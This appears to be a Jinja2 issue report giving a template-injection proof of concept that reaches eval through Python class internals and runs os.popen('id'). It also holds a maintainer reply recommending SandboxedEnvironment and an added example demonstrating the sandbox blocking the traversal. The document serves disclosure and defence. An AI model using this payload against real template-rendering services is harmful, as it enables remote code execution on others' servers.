Execute arbitrary codes in template without sandbox environment.
When I use the Jinja2 template framework in my project, I found a way to call "os.popen('id')" or other functions without a global register. It's easy to get a shell when an attacker can control the template content. Is that by design?
PoC:

```python
# PoC as posted in the issue (Python 2.7 / Jinja2 2.8; func_globals and the
# print statement are Python 2 only)
from jinja2 import Template
content = '''
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{% endif %} {% endif %} {% endfor %}
{% endif %} {% endfor %}
'''
print Template(content).render()
```
I tested this code with Python 2 (2.7.10) and Jinja2 (2.8); if it works, it will print your user's uid...
You should not execute untrusted templates in a non-sandboxed environment. That's exactly why the sandbox exists (and to be honest, even with a sandbox I would not let users provide arbitrary Jinja templates).
Enabling sandboxing by default is not possible due to backwards compat, and also not reasonable because most templates (in Flask) are trusted.
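The distinction the maintainer draws, shown as an added example (this is not code from the issue or from the Jinja2 project): the same attribute traversal the PoC starts from is rendered once with the default `Environment`, which is what Flask templates use, and once with `jinja2.sandbox.SandboxedEnvironment`. The probe template is constructed for this example and only echoes class names, so it executes nothing; it simply shows whether the traversal is reachable. The function names `render_plain` and `render_sandboxed` are my own.

```python
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# Constructed probe: the first hops of the PoC's traversal, but the loop body
# only echoes class names, so it shows whether the traversal is reachable.
PROBE_TEMPLATE = (
    "{% for c in [].__class__.__base__.__subclasses__() %}"
    "{{ c.__name__ }} "
    "{% endfor %}"
)

# A template of the kind users are actually meant to write.
BENIGN_TEMPLATE = "Hello {{ name|upper }}, you have {{ items|length }} item(s)."


def render_plain(source, **context):
    """Render with the default Environment: no attribute is off limits.

    Returns (rendered_ok, output).
    """
    env = Environment(autoescape=True)
    return True, env.from_string(source).render(**context)


def render_sandboxed(source, **context):
    """Render untrusted template text inside the Jinja2 sandbox.

    SandboxedEnvironment.is_safe_attribute refuses any attribute whose name
    starts with '_', so the __class__ lookup yields an undefined value that
    raises SecurityError on the next access, before any subclass is reached.
    Returns (rendered_ok, output_or_error_message).
    """
    env = SandboxedEnvironment(autoescape=True)
    try:
        return True, env.from_string(source).render(**context)
    except SecurityError as exc:
        return False, str(exc)


if __name__ == "__main__":
    ok, out = render_plain(PROBE_TEMPLATE)
    print("plain    :", ok, "->", len(out.split()), "subclass names reached")
    ok, out = render_sandboxed(PROBE_TEMPLATE)
    print("sandboxed:", ok, "->", out)
    ok, out = render_sandboxed(BENIGN_TEMPLATE, name="ana", items=[1, 2])
    print("benign   :", ok, "->", out)
```

The sandbox stops the traversal at its first hop, which is why the maintainer points to it as the right tool; it still does not make arbitrary user-supplied templates safe in general (resource exhaustion and exposure of whatever objects you pass in the context remain), which is the second half of the reply.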